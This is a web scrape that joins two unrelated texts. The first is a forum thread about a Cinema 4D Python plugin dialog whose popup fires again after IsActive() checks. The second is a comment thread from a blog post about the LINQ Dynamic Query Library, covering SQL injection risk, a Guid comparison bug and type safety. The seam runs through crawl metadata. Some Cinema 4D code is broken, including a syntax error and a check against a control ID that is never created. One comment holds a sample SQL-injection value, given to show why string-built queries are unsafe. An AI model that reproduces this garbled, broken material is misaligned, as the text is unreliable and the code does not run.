I still have some problems using IsActive(). I'm having some c4d.plugins.CommandData utilizing the c4d.gui.ShowPopupDialog. Sadly sometimes the Popup will be called even after pressing the button. Happens escpially in the end of the following *.gif. (After clicking on the button, I constantly click on the Menubar, and sometimes the popup will be displayed again...)
c4d.plugins.CommandData
c4d.gui.ShowPopupDialog
My Message(self, msg, result) looks like the following:
Message(self, msg, result)
def Message(self, msg, result):
if c4d.GetC4DVersion() >= 18000:
#Handle CommandDragID
if msg.GetId() == c4d.BFM_INTERACTEND:
if self.IsActive(ids.IDC_BUTTON1):
c4d.CallCommand(ids.PLUGIN_ID_EXPORT)
elif self.IsActive(ids.IDC_BUTTON2):
c4d.CallCommand(ids.PLUGIN_ID_OMCLEANER)
elif self.IsActive(ids.IDC_BUTTON3):
c4d.CallCommand(ids.PLUGIN_ID_PYSCRIPTS)
elif self.IsActive(ids.IDC_BUTTON4):
c4d.CallCommand(ids.PLUGIN_ID_RECENTFILES)
elif self.IsActive(ids.IDC_BUTTON5):
c4d.CallCommand(ids.PLUGIN_ID_CHATLOG)
return c4d.gui.GeDialog.Message(self, msg, result)
Any ideas how to avoid or counter-act this!?
May I ask in what range you enumerated your Dialog controls?
If I recall correctly, there was this kind of behavior if the control IDs were below a certain number.
The ids are starting from 20001.
ids
20001
IDD_DIALOG = 20001
IDC_BUTTONFLUSHGROUP = 20002
IDC_BUTTON1 = 20003
IDC_BUTTON2 = 20004
IDC_BUTTON3 = 20005
IDC_BUTTON4 = 20006
IDC_BUTTON5 = 20007
Then of course the Commands like ids.PLUGIN_ID_EXPORT are generated PluginIDs.
ids.PLUGIN_ID_EXPORT
After looking at your GIF again, it seems like the following happens:
When checking for BFM_INTERACTEND and poking yround inyour dialog, the focus switches back to the last active Gadget. Thus your commands are fired since you are checking if the gadgets do have the focus.
BFM_INTERACTEND
Yeah, I guess that makes sense.
What would be the best way to work around that behaviour?
Shall I return return c4d.gui.GeDialog.Message(self, msg, result) after each c4d.CallCommand()?
return c4d.gui.GeDialog.Message(self, msg, result)
c4d.CallCommand()
A simple else statement didn't work.
Cheers,
Lasse
This does not solve your initial issue since it requires the use of GetItemDim and it was introduced in R18 but here is how to avoid your second issue:
import c4d
class Dialog(c4d.gui.GeDialog):)
self.AddStaticText(10001, 0, 0, name="test")
return True
def Message(self, msg, result):
# Main thread
if msg.GetId() == c4d.BFM_INTERACTSTART:
c4d.StopAllThreads()
# Check the mouse is clicked
state = c4d.BaseContainer()
self.GetInputState(c4d.BFM_INPUT_MOUSE, c4d.BFM_INPUT_MOUSERIGHT, state)
if state.GetInt32(c4d.BFM_INPUT_CHANNEL) != 0:
# Get coordinates
x = state.GetInt32(c4d.BFM_INPUT_X)
y = state.GetInt32(c4d.BFM_INPUT_Y)
g2l = self.Global2Local()
x += g2l['x']
y += g2l['y']
# Checks the coordinate is within the range of the BitmapButton
if self.IsPositionOnGadget(10003, x, y):
print 'Icon clicked in the GeDialog.'
# Stop others event to be processed
self.KillEvents()
return True
return c4d.gui.GeDialog.Message(self, msg, result)
# Main function
def main():
global dlg
dlg = Dialog()
dlg.Open(c4d.DLG_TYPE_ASYNC)
# Execute main()
if __name__=='__main__':
main()
Note that there is a very similar problem Disable default Right-Click Menu that you may found interesting about how to handle popup in your dialog.
And adding this constraint in mind, I'm afraid I don't see any solution to make it work before R18.
Cheers,
Maxime.
Thanks @m_adam for the insights!
Works like a charm!! | https://plugincafe.maxon.net/topic/12413/avoid-isactive | CC-MAIN-2021-49 | refinedweb | 759 | 51.65 |
This Week in Elasticsearch and Apache Lucene - 2019-02-22
Elasticsearch Highlights
Zen2 at scale
We have been investigating Zen2's behaviour with large cluster states and/or large clusters, pushing past the boundaries of what we might consider to be a reasonable deployment and into the territory of the OOM killer. Pleasingly, we found that master election behaves reasonably well even with tens of master-eligible nodes. We fixed one memory-consuming issue ( #39179) and continue to look for other ways to bound the memory needed to publish 100+MB of cluster state to 50+ nodes all at once.
Performance
We have released Rally 1.0.4. We did the release mainly to ensure users can still benchmark in a world of typeless APIs as this will be the default in Elasticsearch 7.0.0.
After switching the default store type from mmapfs to hybridfs we have seen reduced performance in our nightly benchmarks (up to 20% less indexing throughput and significantly increased latency for some queries). The goal of that change was to avoid page cache thrashing for very large indices but for practical purposes (all benchmarks need to finish within a day) our nightly benchmarks use only rather "small" indices of up to 75GB. It turns out that Lucene uses a combined segment file format (.cfs) for smaller segments to save file handles which we accessed via NIO instead of memory-mapping them and that lead to significantly worse performance for the "small" indices we use in our nightly benchmarks. After discussions with the Lucene team and more benchmarking, we have now added cfs files to the list of files to memory-map. This restored original performance for small indices while retaining the performance benefit for large indices.
ILM (and CCR)
ILM is now fully integrated with CCR (#34648). The final commit to ensure the ILM and CCR work correctly together has been merged (#38529).
In order to replicate across clusters efficiently and correctly, CCR needs to keep a history of the operations performed on a leader shard - indexing, deletes, etc. When those operations are replicated to the follower shard, they'll be applied in a way that keeps everything consistent. If CCR doesn't have that history of operations, it has to fall back to file-based recovery, which can be much less efficient. During this time, there would not be any available shard copy on the follower side, making this a situation that we want to avoid.
Shard history retention leases allow the follower to be able to mark in the changes stream where it is, allowing the leader to keep all shard history after the operation specified in the lease to ensure that it doesn't have to be rebuilt from scratch via a file-based recovery.
ILM now pays attention to these leases and waits to perform operations that would necessarily destroy shard history, specifically the Shrink and Delete actions, if there are any leases put in place by followers, ILM will wait until those leases are released by the follower or the leases time out. This makes sure we keep all the shard history around so that it can be replicated to followers - if we didn't do this, we would risk losing the history of shard operations while a follower is still trying to replicate operations from the leader.
Search - Intervals
We exposed some additional Interval filters to the elasticsearch query DSL. These new operators
overlapping,
before and
after add new ways to match intervals within documents.
DFS query
We worked on an improvement to the way DFSPhase builds distributed term statistics. This is part of a longer-term plan to possibly remove Weight.extractTerms() from Lucene.
ES Management UI
We also worked on refactoring our server logic to a common library and avoid loads of code duplication across our apps. This work inspired us to work on refactoring our License checker logic for our application. This is the first step towards improving our UX to guide our users when they don't have the correct license to access a plugin.
ODBC
We implemented the functionality to enable the new DATE data type conversions. With it, an application that queries a column of type DATE will have the data returned as native ODBC DATE data structure, with all components broken down, thus enabling faster operations on it. This PR also updates the currently advertised available standards scalars.
Apache Lucene
Query Visiting
Our team members are known for bringing up decade old issues after we learned a lot more what needs to be done, this time we are looking into Query Visitors to add a generic and flexible way to traverse Query trees. It's puzzling why these issues are originally assigned or opened by the same person.
Last Minute
We got in some last minute API breakage into 8.0 that makes delegation of TermsEnum much less trappy. This caused many issues in the past including enormous memory usage and slow retrieval.
Also coming in last minute we added On-Disk term dictionaries. FSTs are Lucene's wonder weapon when it gets to fast term lookups. This data-structure is loaded entirely into heap memory until 8.0. Now in 8.0 FST are read from disk if the file is memory mapped. It tries to detect if mmap directory is used and reads off-disk if the term statistics imply that the field is not a ID field. The performance numbers are on-par with in-memory for non-ID fields while saving significant amounts of memory.
Geo Land
We pushed another performance optimization on the BKD tree by making the heap objects more efficient. This change has a side effect on other indexing strategies (e.g BKD tree on 1 dimensional points) as the tree will always create one of those heap objects regardless the data that is going to work on. We opened another issue to create such objects only when they are needed. We also refactored the tests for LatLonShape as a step to facilitate the implementation of CONTAINS.
Changes in Elasticsearch
Changes in 8.0:
- Fix the OS sensing code in ClusterFormationTasks 38457
- Remove setting index.optimize_auto_generated_id (#27583) 27600
Changes in 7.1:
- Distance measures for dense and sparse vectors 37947
- Don't swallow IOExceptions in InternalTestCluster. 39068
- BREAKING: Enforce Completion Context Limit 38675
- Add overlapping, before, after filters to intervals query 38999
- Tie break search shard iterator comparisons on cluster alias 38853
Changes in 7.0:
- Remove
nGramand
edgeNGramtoken filter names (#38911) 39070
- Extend nextDoc to delegate to the wrapped doc-value iterator for date_nanos 39176
- Do not create the missing index when invoking getRole 39039
- Don't close caches while there might still be in-flight requests. 38958
- Blob store compression fix 39073
- Fix libs:ssl-config project setup 39074
- Fix #38623 remove xpack namespace REST API 38625
- Also mmap cfs files for hybridfs 38940
- Recover peers from translog, ignoring soft deletes 38904
- Fix NPE on Stale Index in IndicesService 38891
Changes in 6.7:
- ReadOnlyEngine should update translog recovery state information 39238
- Align generated release notes with doc standards 39234
- Rebuild remote connections on profile changes 37678
- minor updates for user-agent ecs for 6.7 39213
- Only create MatrixStatsResults on final reduction 38130
- Link to 7.0 documentation in deprecation checks 39194
- Ensure global test seed is used for all random testing tasks 38991
- Bump jackson-databind version for AWS SDK 39183
- Reduce refresh when lookup term in FollowingEngine 39184
- Deprecate fallback to java on PATH 37990
- Deprecate Hipchat Watcher actions 39160
- Bump jackson-databind version for ingest-geoip 39182
- Remove retention leases when unfollowing 39088
- Resolve concurrency with watcher trigger service 39092
- Allow retention lease operations under blocks 39089
- Fix DateFormatters.parseMillis when no timezone is given 39100
- Fix shard follow task startup error handling 39053
- Specify include_type_name in HTTP monitoring. 38927
- Introduce retention lease state file 39004
- Generate mvn pom for ssl-config library 39019
- Integrate retention leases to recovery from remote 38829
- ShardBulkAction ignore primary response on primary 38901
Changes in 6.6:
- SQL: add "validate.properties" property to JDBC's allowed list of settings 39050
- SQL: enforce JDBC driver - ES server version parity 38972
- Fix simple query string serialization conditional 38960
- Advance max_seq_no before add operation to Lucene 38879
Changes in 6.5:
Changes in Elasticsearch Management UI
Changes in 7.1:
- [Rollup] Add unit tests for Job table 31561
- [CCR] Add
data-test-subjto forms and buttons 30325
- [CCR] i18n feedback 30028
Changes in Elasticsearch SQL ODBC Driver
Changes in 7.1:
Changes in 6.7:
Changes in Rally
Changes in 1.0.4: | https://www.elastic.co/es/blog/this-week-in-elasticsearch-and-apache-lucene-2019-02-22 | CC-MAIN-2019-30 | refinedweb | 1,437 | 58.82 |
Data is everywhere. And in massive quantities.. This model will learn to detect if a hotel review is positive or negative and will be able to understand the sentiment of new and unseen hotel reviews.
The first step is to scrape hotel reviews from TripAdvisor by creating a spider:
New to Scrapy? If you have never used Scrapy before, visit this article. It's very powerful yet easy to use, and will allow you to start building web scrapers in no time.
Choose the data you want to scrape with Scrapy In this tutorial we will use New York City hotel reviews to create our hotel sentiment analysis classifier. In our case we will extract the review title, the review content and the stars:
A TripAdvisor hotel review breakdown
Why the stars? In order to train MonkeyLearn models, we need data that is already tagged, so the algorithm knows how a positive or a negative review actually looks like. Luckily the reviewers were kind enough to provide us with this information, in the form of stars.
To save the data, we will define a Scrapy item with three fields: "title", "content" and "stars":
import scrapy class HotelSentimentItem(scrapy.Item): title = scrapy.Field() content = scrapy.Field() stars = scrapy.Field()
We also create a spider for filling in these items. We give it the start URL of the New York Hotels page.
import scrapy from hotel_sentiment.items import HotelSentimentItem class TripadvisorSpider(scrapy.Spider): name = "tripadvisor" start_urls = [ "" ]
Then, we define a function for parsing a single review and saving its data:
def parse_review(self, response): item = HotelSentimentItem() item['title'] = response.xpath('//div[@class="quote"]/text()').extract()[0][1:-1] #strip the quotes (first and last char) item['content'] = response.xpath('//div[@class="entry"]/p/text()').extract()[0] item['stars'] = response.xpath('//span[@class="rate sprite-rating_s rating_s"]/img/@alt').extract()[0] return item
Afterwards, we define a function for parsing a page of reviews and then passing the page. You'll notice that on the reviews page we can't see the the whole review content, just the beginning. We will work around this by following the link to the full review and scraping the data from that page using parse_review :
def parse_hotel(self, response): for href in response.xpath('//div[@class="quote"]/a/@href'): url = response.urljoin(href.extract()) yield scrapy.Request(url, callback=self.parse_review) next_page = response.xpath('//div[@class="unified pagination "]/child::*[2][self::a]/@href') if next_page: url = response.urljoin(next_page[0].extract()) yield scrapy.Request(url, self.parse_hotel)
Finally, we define the main parse function, which will start at the New York hotels main page, and for each hotel it will parse all its reviews:
def parse(self, response): for href in response.xpath('//div[@class="listing_title"]/a/@href'): url = response.urljoin(href.extract()) yield scrapy.Request(url, callback=self.parse_hotel) next_page = response.xpath('//div[@class="unified pagination standard_pagination"]/child::*[2][self::a]/@href') if next_page: url = response.urljoin(next_page[0].extract()) yield scrapy.Request(url, self.parse)
So, to review: we told our spider to start at the New York hotels main page, follow the links to each hotel, follow the links to each review, and scrape the data. After it is done with each page it will get the next one, so it will be able to crawl as many reviews as we need.
You can view the full code for the spider here.
So we have our Scrapy spider created, we are ready to start crawling and gathering the data.
We tell it to crawl with scrapy crawl tripadvisor -o scrapyData.csv -s CLOSESPIDER_ITEMCOUNT=10000
This will scrape 10,000 TripAdvisor New York City hotel reviews and save them in a CSV file named scrapyData.csv . With that many reviews, it may take a while to finish. Feel free to change the amount if you need.
So we generated our scrapyData.csv file, now it's time to preprocess the data. We'll do that with Python and the Pandas library.
First, we import the CSV file into a data frame, remove duplicates, drop the reviews that are neutral (3 of 5 stars):
import pandas as pd # We use the Pandas library to read the contents of the scraped data # obtained by Scrapy df = pd.read_csv('scrapyData.csv', encoding='utf-8') # Now we remove duplicate rows (reviews) df.drop_duplicates(inplace=True) # Drop the reviews with 3 stars, since we're doing Positive/Negative # sentiment analysis. df = df[df['stars'] != '3 of 5 stars']
Then we create a new column that concatenates the title and the content:
# We want to use both the title and content of the review to # classify, so we merge them both into a new column. df['full_content'] = df['title'] + '. ' + df['content']
Then we create a new column that will be what we want to predict: Good or Bad, so we transform reviews with more than 3 stars into Good, and reviews with less than 3 stars into Bad:
def get_class(stars): score = int(stars[0]) if score > 3: return 'Good' else: return 'Bad' # Transform the number of stars into Good and Bad tags. df['true_category'] = df['stars'].apply(get_class)
We'll keep only the full_content and true_category columns:
df = df[['full_content', 'true_category']]
If we take a look at the data frame we created it may look something like this:
To have a quick overview of the data, we have 4,913 Good reviews and 4,501 Bad reviews:
# Print a histogram of sentiment values df['true_category'].value_counts() Good 4913 Bad 4501 dtype: int64
This looks about right. If you have too few reviews for a particular tag (for instance, 9,000 Good and 1,000 Bad), it could have a negative impact on the training of your model. To fix this, scrape more bad reviews: run the spider again, for a longer time, then get only the bad reviews and mix them with the data you already have. Or you could find hotels with mostly bad reviews and scrape those.
Finally, we have to save our dataset as a CSV or Excel file so we can upload it to MonkeyLearn to train our classifier. To train our model we only need the content of the reviews and the corresponding tags, so we remove the headers and the index column. We also encode the file in UTF-8:
# Write the data into a CSV file df.to_csv('scrapyData_MonkeyLearn.csv', header=False, index=False, encoding='utf-8')
Ok, now it's time to move to MonkeyLearn. We want to create a text classifier that classifies reviews into two possible tags Good or Bad. This process is known as Sentiment Analysis, that is, identifying the mood from a piece of text.
First, you have to sign up for Monkeylearn, and after you log in you will see the main dashboard. MonkeyLearn has public models created by the MonkeyLearn team trained for specific tasks, but it also allows you to create your own custom model to fit your needs. In this case, you'll build a custom text classifier, so click the Create Model button: | https://monkeylearn.com/blog/creating-sentiment-analysis-model-with-scrapy/ | CC-MAIN-2022-27 | refinedweb | 1,180 | 64 |
Howdy all,
I’m having an issue using strok to pull a string of chars apart on an ESP32, using the Arduino IDE.
Here’s the code so far :
#include "string.h" String inboundText = "2,4,6"; void setup() { Serial.begin(115200); char buf[100]; char delimiter = ','; inboundText.toCharArray(buf,sizeof(inboundText)); char* ptr = strok(buf,delimiter); while(ptr!=NULL) { printf("found one part: %s/n",ptr); //create the next part ptr = strok(NULL, delimiter); } }
The code won’t compile, saying “‘strok’ was not declared in this scope”.
I’ve searched high and low, added every reference under the sun, but still can’t get this to work.
Any help would be greatly appreciated.
Cheers | https://forum.arduino.cc/t/strok-not-declared-in-this-scope/851104 | CC-MAIN-2021-43 | refinedweb | 115 | 68.26 |
LIN. Recently a few people have sent me mail asking how to handle these types of scenarios using LINQ. The below post describes how you can use a Dynamic Query Library provided by the LINQ team to dynamically construct LINQ queries.
Included on the VS 2008 Samples download page are pointers to VB and C# sample packages that include a cool dynamic query LINQ helper library. Direct pointers to the dynamic query library (and documentation about it) can be found below:
Both the VB and C# DynamicQuery samples include a source implementation of a helper library that allows you to express LINQ queries using extension methods that take string arguments instead of type-safe language operators. You can copy/paste either the C# or VB implementations of the DynamicQuery library into your own projects and then use it where appropriate to more dynamically construct LINQ queries based on end-user input.
You can use the DynamicQuery library against any LINQ data provider (including LINQ to SQL, LINQ to Objects, LINQ to XML, LINQ to Entities, LINQ to SharePoint, LINQ to TerraServer, etc). Instead of using language operators or type-safe lambda extension methods to construct your LINQ queries, the dynamic query library provides you with string based extension methods that you can pass any string expression into.
For example, below is a standard type-safe LINQ to SQL VB query that retrieves data from a Northwind database and displays it in a ASP.NET GridView).
Included with the above VB and C# Dynamic Query samples is some HTML documentation that describes how to use the Dynamic Query Library extension methods in more detail. It is definitely worth looking at if you want to use the helper library in more depth:
You can download and run basic VB and C# samples I've put together that demonstrate using the Dynamic LINQ library in an ASP.NET web-site that queries the Northwind sample database using LINQ to SQL:
You can use either Visual Web Developer 2008 Express (which is free) or VS 2008 to open and run them.
Using the dynamic query library is pretty simple and easy to use, and is particularly useful in scenarios where queries are completely dynamic and you want to provide end user UI to help build them.
In a future blog post I'll delve further into building dynamic LINQ queries, and discuss other approaches you can use to structure your code using type-safe predicate methods (Joseph and Ben Albahari, authors of the excellent C# 3.0 In a Nutshell book, have a good post on this already here).
Hope this helps,
Scott
That´s nice, but how is it handled in LINQ to SQL? Is it possible to use sqlparameters, or does it prevent SQL injection in some other way in senarios like this:
.Where(String.Format("CategoryID={0}" & Request.QueryString["id"])
Thanks Scott, following you up on.
Hi Jonatan,
>>>>>> That´s nice, but how is it handled in LINQ to SQL? Is it possible to use sqlparameters, or does it prevent SQL injection in some other way in senarios like this: .Where(String.Format("CategoryID={0}" & Request.QueryString["id"])
Becausehect the values as params that you pass separately.
You've been kicked (a good thing) - Trackback from DotNetKicks.com
Thank you Scott!
I download the C# Dynamic Query Library you gave. I found nice example of Dlinq into path CSharpSamples\LinqSamples\DynamicQuery\DynamicQuery and then I found nice 101 examples into this path CSharpSamples\LinqSamples\SampleQueries about Linq at all. Just run it by VS2008 Express i had all examples by different implementation of linq, like:
- Linq To Sql
- Linq to XML
- Linq over DataSet
- XQury use cases
Great!
Great! So why is this a zip somewhere on MSDN that has a code file we need to compile? If this works as good as you say it does, please consider putting it in the Extensions release.
Thanks!
erm...
"One of the benefits of LINQ is that it enables you to write type-safe queries in VB and C#. "
and then you come with an example which precisely kills this benefit.
Why not use the example of concatenate Linq queries? (where you use one linq query in another one, which will be combined into 1 expression tree at runtime by the provider?)
Interesting stuff!! I'll have a closer look later.
Is this new? Or has it been around for a while and I just haven't noticed.
Hi Frans,
>>>>>> Why not use the example of concatenate Linq queries? (where you use one linq query in another one, which will be combined into 1 expression tree at runtime by the provider?)
As I said at the end of this post, my next dynamic linq post will cover using predicate methods to compose LINQ queries. This enables type-safe expression composition.
Thanks,
Hi Ben,
>>>>>>> Interesting stuff!! I'll have a closer look later. Is this new? Or has it been around for a while and I just haven't noticed.
Believe it or not it has been around awhile. :-) I believe it shipped in the samples in Beta2.
Hi Scott,
For interest I posted something on using the predicate approach, via the specification pattern back in August on my old blog: iancooper.spaces.live.com/.../cns!844BD2811F9ABE9C!451.entry
I'll probably update for the release version of LINQ at some point this month on the new blog as part of the series there on architecting LINQ applications.
Hey Scott,
Another great post. How's Part 5 of the MVC Series coming?
--Steve
Yesterday I published an article about dynamic Where- and OrderBy-clauses in LINQ to SQL. It covers function delegates, expression trees and the PredicateBuilder class from Joseph Albahari.
Interesting! Coding with LINQ Dynamic Query Library looks very similar to SubSonic ...
Thank you! I will spend some time on it.
Using this removes the real time compiler checking for the syntax, isn't it?
It looks more like Subsonic query or Nhibernate hql......
Is it possible to combine a strongly typed Linq expression with a dynamic query?
For example, create your base query:
var query = from p in Northwind.Products
where p.CategoryID = 2
select p
and then append a dynamic order by to the query, something like
query.OrderBy = "SupplierId"
I prefer to use the strongly typed approach but as you said, not all scenarios allow this (Custom sorting in particular) in which case it would be nice to still do the bulk of your Linq in a strongly typed manor
Pingback from Dynamic LINQ (Part 1: Using the LINQ Dynamic Query Library) - ScottGu’s Blog « Noocyte’s Weblog
Any Silverlight 2.0 posts in the works?
Hi Scott:
You can read this post in spanish here:
thinkingindotnet.wordpress.com/.../dynamic-linqparte-1-usando-la-libreria-de-linq-dynamic
Good things,
Type-safe and prevent SQL injection.
I am looking at for your next post....
Anyway thanks for sharing the information...
Regards
Felix
Hey Now Scott,
The library's sure are a great resource.
Thx,
Catto
I have been playing with the Dynamic Query Library for a while now. However, I never could figure out a way to do joins, using this library.
Pingback from Dynamic LINQ (Part 1: Using the LINQ Dynamic Query Library) - ScottGu’s Blog » article » Thats The New Thing!
What about a scenario where we let our users add their own custom columns to a table (SQL). Can we use Linq to query a table that has changed? Is there some kind of “Refresh” or something of that sort?
Scott, I think you meant to have the arguments w/o the call to String.Format like this:
.Where("CategoryID=@0", Request.QueryString["id"])
Using String.Format is just a fancier way to concatenate strings and its use can still lead to string injection attacks.
For example: .Where(String.Format("CategoryID={0}", "'X' OR Secrets=1"))
When you use the Dynamic API with the '@' parameters and specify arguments directly the two are never concatenated together so your arguments are kept isolated all the way through. A text variables contents will never be misinterpreted as part of the query.
Hi Scott,
Linq is realy great, for me the best thing since Object Oriented Programming (realy!). However, this move i can't follow. Everything you are doing here (and _much_ more) can be done if you have combinable expressions. And that is not hard to implement. So why do you want us to return to the dark ages of glueing strings together to build a query, where you could have a fully typesafe intellisensable solution that would look like:
if (!String.NullOrEmpty(catselect)) {
var oldwhereclause=whereclause;
whereclause = p => oldwhereclause(p) && p.Category.CATEGORYNAME==catselect;
}
var q =
from p in ...
.Where(whereclause) // don't realy like this syntax here but it works..
Note that not only my where clause is now constructed typesafe, also the tables needed for the query are changed, which would be troublesome is a string-glueing aproach.
Cheers, Ferdinand Swaters (still on 2008 Beta 2)
Scott,
Sometime ago you mentioned about doing a post on how to use LINQ in a multi-tier enviroment, I would love to get into LINQ but can't see on how this could work. Would very much appreciate if you could comment on that.
Thanks in advance
Shloma
Pingback from oakleafblog.blogspot.com/.../linq-and-entity-framework-posts-for.html.
Thanks for this addition, too:
.Where(String.Format("CategoryID={0}" & Request.QueryString["id"])
.Where(String.Format("CategoryID=@0", Request.QueryString["id"])
--rj
Hmm try this the link comes out better. It's the overview from my latest series on LINQ codebetter.com/.../architecting-linq-to-sql-applications-part-4.aspx
Thanks Scott!
Is it possible to get the following behavior with this library (Like statement "%")? I am having trouble getting it to work.
Dim _Course = From p In University.Courses _
Where p.Course_Name.StartsWith("B") _
Select p
Pingback from Inferis’ Mind Dump » Blog Archive » links for 2008-01-08
Is LINQ to SQL suitable for multi-tier apps? I've read on various sites that LINQ to SQL lacks mulit-tier capabilities. Is this true? Are you still planning a blog to cover multi-tier using LINQ to SQL?
Great stuff, but isn't the example dynamic query library already included in System.Web.Query.Dynamic? Any idea why the classes in that namespace are not public?
Andrew
I don't think your Dynamic LINQ is very good.I think we can use lambda tree to create dynamic LINQ better.
Hi Scott, welcome to China. :)
Welcome to China. :) :) :) :) :) :)
HI man,welcome to china!
Welcome to China ;-)
Welcome to China.
What would be sweet is some kind of Predicate textbox that would do Intellisense for the user by understanding the parms, types and operators the dev "sets" for the textbox.
ASP.NET Web Development Toolbox [Via: Chris Brandsma ] WPF WPF/Xaml Web News - 2008/01/08 [Via: rrelyea...
Hi Stefan,
>>>>>> Yesterday I published an article about dynamic Where- and OrderBy-clauses in LINQ to SQL.
That is a great article. Pointing others at it in case they missed it:
Hi Kris,
>>>>>>> Is it possible to combine a strongly typed Linq expression with a dynamic query?
Yes - you can mix both strongly typed queries and the dynamic string based queries together, which is quite nice and useful.
Hi Kevin,
>>>>>>> Any Silverlight 2.0 posts in the works?
Yep - I am just getting ready to start posting heavily on Silverlight 2.0. :-)
Hi Felix,
>>>>>>...
I haven't posted on M:M relationships yet. Here is a blog post that discusses it a little though: blogs.msdn.com/.../how-to-implement-a-many-to-many-relationship-using-linq-to-sql.aspx
Hi Ferdinand,
>>>>>>> Linq is realy great, for me the best thing since Object Oriented Programming (realy!). However, this move i can't follow. Everything you are doing here (and _much_ more) can be done if you have combinable expressions
This post is part 1 of 2. In the second part I'm going to discuss using combined expressions and predicate builders to do type-safe query composition.
Hi Shloma,
>>>>>>> Sometime ago you mentioned about doing a post on how to use LINQ in a multi-tier enviroment, I would love to get into LINQ but can't see on how this could work. Would very much appreciate if you could comment on that.
I still need to write a post on this with LINQ to SQL. It is on my list of things to-do (unfortunately it is a big list though!).
Sorry!
Hi Trent,
>>>>>>> Is it possible to get the following behavior with this library (Like statement "%")? I am having trouble getting it to work.
You can use .StartsWith(), .EndsWith() and .Contains() to get functionality similar to the like statement with SQL.
Hi Andrew,
>>>>>>> Great stuff, but isn't the example dynamic query library already included in System.Web.Query.Dynamic? Any idea why the classes in that namespace are not public?
Yep - this functionality is included for the LinqDataSource control in ASP.NET. Unfortunately the LINQ team didn't have time to fully design the dynamicquery library to the extent they felt comfortable shipping it as a broadly generic library in the framework with .NET 3.5 - which is why it is currently shipped as a source sample.
Welcome to China
Good article Scott, as always.
I've been looking at using the CLR in SQL Server to get round problems with dynamic queries in stored procedures. I haven't seen much on the use of LINQ within SQL Server itself. Are you aware of any problems and would I be able to use the Dynamic Query Library there as well?
Thanks, Simon
Maybe I could bribe you with something to push this one up the list a bit :)...
Anyway your posts are very much welcome, I love your writing style and to-the-point approach!
Enjoy
Thanks Scott, really nice post!!
In your code what is NorthwindDataContext?
Pingback from Random Reading: F#, Linq, ToyScript « Tales from a Trading Desk
Impressive! This is far more easier dan lambda expressions to build complex and/or search queries. The only thing holding me from dropping Gentle and using Linq all the way is Oracle support. I hope Core Lab, OpenLink, DataDirect or Oracle will support Linq to Sql soon (without having to use the Entity Framework :). Do you have some info about this?
By the way, for those lambda fans:
I really like where you are going with these examples Scott. I've been looking through some of the LINQ documentation and I find changes in the way people are accessing the data in their DataContext. Sometimes they use something like 'from n in src.records' and sometimes they use 'src.records.select'. I was wondering what the real difference is in the two and what the trade offs of using either would be?
I made my own little example of some timing to see which would be faster for a simple select. I am consistently finding that the 'from n in src.records' is much faster than the other type.
///////////////////////
// Code Snippet
//////////////////////
[DllImport("kernel32.dll")]
extern static short QueryPerformanceCounter(ref long x);
extern static short QueryPerformanceFrequency(ref long x);
long start2 = 0, end2 = 0;
QueryPerformanceCounter(ref start2); // start timer
var visitors2 = from v in SrcContext.visitors where v.active == true select v;
QueryPerformanceCounter(ref end2); // end timer
long start1 = 0, end1 = 0;
QueryPerformanceCounter(ref start1); // start timer
var visitors1 = SrcContext.visitors.Select(c => c.active == true);
QueryPerformanceCounter(ref end1); // end timer
// retrieve frequency
long freq = 0;
QueryPerformanceFrequency(ref freq);
double total1 = (end1 - start1) * 1.0 / freq;
double total2 = (end2 - start2) * 1.0 / freq;
////////////////
// End
Pingback from CodeDom extensions and dynamic LINQ (string/script to LINQ emitting) « Igor’s Weblog
Has anybody tried it on DataTables? I tried it, but I think I did something wrong or it is not supported.
Thanks for any help!
Evert
動的 LINQ (パート 1: LINQ 動的クエリライブラリの使用)
Pingback from Weekly Link Post 24 « Rhonda Tipton’s WebLog
Pingback from .NET Framework 3.5 RTM « C:\>dir *.*
Pingback from Dynamic LINQ (Part 1: Using the LINQ Dynamic Query Library) | DavideZordan.net
Resumo da semana - 14/01/2008
Does anyone have any examples of how to use the dynamic query on XML instead of SQL? It would be great if there is an example of how to apply an orderby and allocate the type of the orderby dynamically as well with the source being XML.
ScottGu nous parle de LINQ et des requêtes dynamiques, affaire à suivre...
This is great. I'm glad you've done it, you saved me from updating my dynamic querying library to work with Linq.
I can't find the namespace of those extension methods though, whey do they live?
Paymon
En principio, la tecnología LINQ nos permite hacer cosas bastante interesantes para recolectar objetos
Dim values = From t1 In MyTables.Table1 _
JOIN t2 In MyTables.Table2 On t1.ID Equals t2.ID
Select t1, t2
How do I dynamically order this query ??
"Operator '==' incompatible with operand types 'Guid?' and 'Guid'"
what am i doing wrong here?
Guid? SiteID = ((COM_Site)(cmbSectiesDynamic.SelectedItem)).ID;
List<Employee> employeeList = this.m_databaseContext.Employees.Where("SiteID ==@0",SiteID).ToList();
i don't get it..
@Paymon
You need to copy paste the Dynamic.cs class into your project.
You can find this class in the examples or here:
tomvangaever.be/.../Dynamic.cs
when you add this class to your solution you can enter:
using System.Linq.Dynamic;
and there you go :)
Does anyone know why this nullable Guid doesn't want to work...?
.Tom
Una de las preguntas más típicas que surgen cuando he impartido algún seminario en el
Pingback from log.itto.be » Blog Archive » links for 2008-01-30
Tom - the "Operator '==' incompatible with operand types 'Guid?' and 'Guid'" issue looks like a bug in System.Linq.Dynamic.
See this thread: forums.microsoft.com/.../ShowPost.aspx
I'm not totally sure if this is a good thing. The great benefit of the 'old' linq is the fact that's it's strong typed. In the early .net days we had typed datasets which is replaced with the much better Linq to Sql. Linq is already providing joining, grouping and filtering.
I can already do: db.Products.Where(p => p.Category.CategoryName == "Beverages");
In a production environment 'dynamic' queries don't exist. because all queries are constructed based on contextual arguments. There's nothing dynamic about categoryid (which in your example is filtered on the value '2'). It's not like if I suddenly pass an url parameter SupplierID=5 that's it's included in the query.
So all query are predetermined. My example can easily changed into db.Products.Where(p => p.Category.CategoryID == Request.QueryString("CatID"));. Using the MVC web application CatID is even processed by controller and passed as a strong (validated) parameter to the data layer (Models).
Back in the classic ASP days late binding was normal. These days we use strong typed code so the compiler can warn us about any typo's we might have made. Very important for beginning programmers.
And even linq itself can be used to 'dynamicly' construct a query. Let's say a admin user want to filter the product list. The UI provides him (even better her ;-) which the dropdowns for category, supplier and a textbox for entering minimum unitprice. Most databases only use positive ID's for primary keys, so a returned (form) value of -1 means no selection has been made. UnitPrice has been defined as double? (nullable)
var products =northwind.Products; //just initializing the quey
if (categoryId > -1)
products.Where(p => p.Category.CategoryID == categoryId);
if (supplierId > -1)
products.Where(p => p.Supplier.SupplierID == supplierId);
if (unitPrice != null)
products.Where(p => p.UnitPrice >= unitPrice);
DataGrid.DataSource = products;
DataGrid.DataBind(); //Database query is performed here
